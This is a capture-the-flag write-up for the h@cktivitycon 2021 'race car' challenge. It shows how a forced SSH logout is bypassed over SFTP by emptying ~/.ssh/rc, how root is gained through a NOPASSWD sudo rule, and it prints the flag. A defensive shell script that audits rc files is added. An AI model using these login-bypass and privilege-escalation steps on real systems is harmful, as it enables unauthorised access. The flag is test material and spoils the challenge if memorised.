/ctfs/h@cktivitycon - 2021/misc/race car

Apparently, we have SSH credentials, but the session seems to be shut down automatically every time we log in.
ssh -p 32689 user@challenge.ctf.games
user@challenge.ctf.games's password: 
Connection to challenge.ctf.games closed by remote host.
Connection to challenge.ctf.games closed.
So I found a bypass for that problem: as you know, one part of the SSH protocol is the secure FTP protocol (SFTP). So I tried to log in with sftp...

sftp -P 32689 user@challenge.ctf.games
user@challenge.ctf.games's password: 
Connected to challenge.ctf.games.
sftp> ls -la
drwxr-xr-x    1 user     user         4096 Sep 19 09:22 .
drwxr-xr-x    1 root     root         4096 Sep 16 14:43 ..
-rw-r--r--    1 user     user          220 Feb 25  2020 .bash_logout
-rw-r--r--    1 user     user         3771 Feb 25  2020 .bashrc
drwx------    2 user     user         4096 Sep 19 09:22 .cache
-rw-r--r--    1 root     root            0 Sep 16 14:44 .hushlogin
-rw-r--r--    1 user     user          807 Feb 25  2020 .profile
drwxr-xr-x    1 root     root         4096 Sep 16 14:44 .ssh
Great! Now let's find out why the SSH connection is closed each time we try to log in.

sftp> cd .ssh
sftp> ls
rc  
sftp> get rc
Fetching /home/user/.ssh/rc to rc

cat rc
#!/bin/bash

pkill ssh
logout

Okay, it's because of this script that we are disconnected. Let's remove it and get a shell.
echo "" > rc
sftp -P 32689 user@challenge.ctf.games
user@challenge.ctf.games's password:
Connected to challenge.ctf.games.

sftp> cd .ssh
sftp> put rc
Uploading rc to /home/user/.ssh/rc
sftp> ^D

ssh -p 32689 user@challenge.ctf.games   
user@challenge.ctf.games's password: 
user@race-car-30918e9ac65137c5-56bd64f95d-nff7h:~$ id 
uid=1000(user) gid=1000(user) groups=1000(user)
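
The behaviour above comes from sshd running ~/.ssh/rc at login, before the user's shell starts. As an added example that is not part of the original write-up, here is a small audit a defender could run over a home root to spot rc files like this one. The function names (rc_flags, audit_ssh_rc), the flag names and the command pattern are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit per-user ~/.ssh/rc files.
# sshd runs ~/.ssh/rc at login before the user's shell, so an rc that kills
# the session (like the one fetched above) locks out every interactive login.

# rc_flags FILE -> prints space-separated findings for one rc file.
rc_flags() {
    f=$1
    out=""
    # Any line that is neither blank nor a comment is a command sshd will run.
    if grep -Evq '^[[:space:]]*(#.*)?$' "$f"; then
        out="$out HAS_COMMANDS"
    fi
    # Session-ending commands. The list is an assumption built from the rc
    # shown in the write-up (pkill, logout) plus close relatives.
    if grep -Eq '^[[:space:]]*(pkill|killall|kill|logout|exit)([[:space:]]|$)' "$f"; then
        out="$out KILLS_SESSION"
    fi
    # Group- or world-writable rc: another account could plant login commands.
    if [ -n "$(find "$f" \( -perm -020 -o -perm -002 \) -print)" ]; then
        out="$out LOOSE_PERMS"
    fi
    echo "${out# }"
}

# audit_ssh_rc HOME_ROOT -> one "path: flags" line per rc file with findings.
audit_ssh_rc() {
    root=${1:-/home}
    for rc in "$root"/*/.ssh/rc; do
        [ -f "$rc" ] || continue
        flags=$(rc_flags "$rc")
        [ -n "$flags" ] && echo "$rc: $flags"
    done
    return 0
}

# Constructed sample: the rc from the write-up, in a throwaway home root.
demo=$(mktemp -d) && mkdir -p "$demo/user/.ssh"
printf '#!/bin/bash\n\npkill ssh\nlogout\n' > "$demo/user/.ssh/rc"
audit_ssh_rc "$demo"
rm -rf "$demo"
```

Where per-user rc files are not needed at all, setting PermitUserRC no in sshd_config stops sshd from executing them.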


Nice, now let's root it
user@race-car-30918e9ac65137c5-56bd64f95d-nff7h:~$ sudo -l
Matching Defaults entries for user on race-car-30918e9ac65137c5-56bd64f95d-nff7h:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user may run the following commands on race-car-30918e9ac65137c5-56bd64f95d-nff7h:
    (root) NOPASSWD: ALL

#We can execute any command as root
user@race-car-30918e9ac65137c5-56bd64f95d-nff7h:~$ sudo bash
root@race-car-30918e9ac65137c5-56bd64f95d-nff7h:~# id
uid=0(root) gid=0(root) groups=0(root)
#Now let's get the flag
root@race-car-30918e9ac65137c5-56bd64f95d-nff7h:/home/user# cd /root
root@race-car-30918e9ac65137c5-56bd64f95d-nff7h:~# ls
flag.txt
root@race-car-30918e9ac65137c5-56bd64f95d-nff7h:~# cat flag.txt 
flag{f3deae2684d2bbec63d088374502a339}
Done!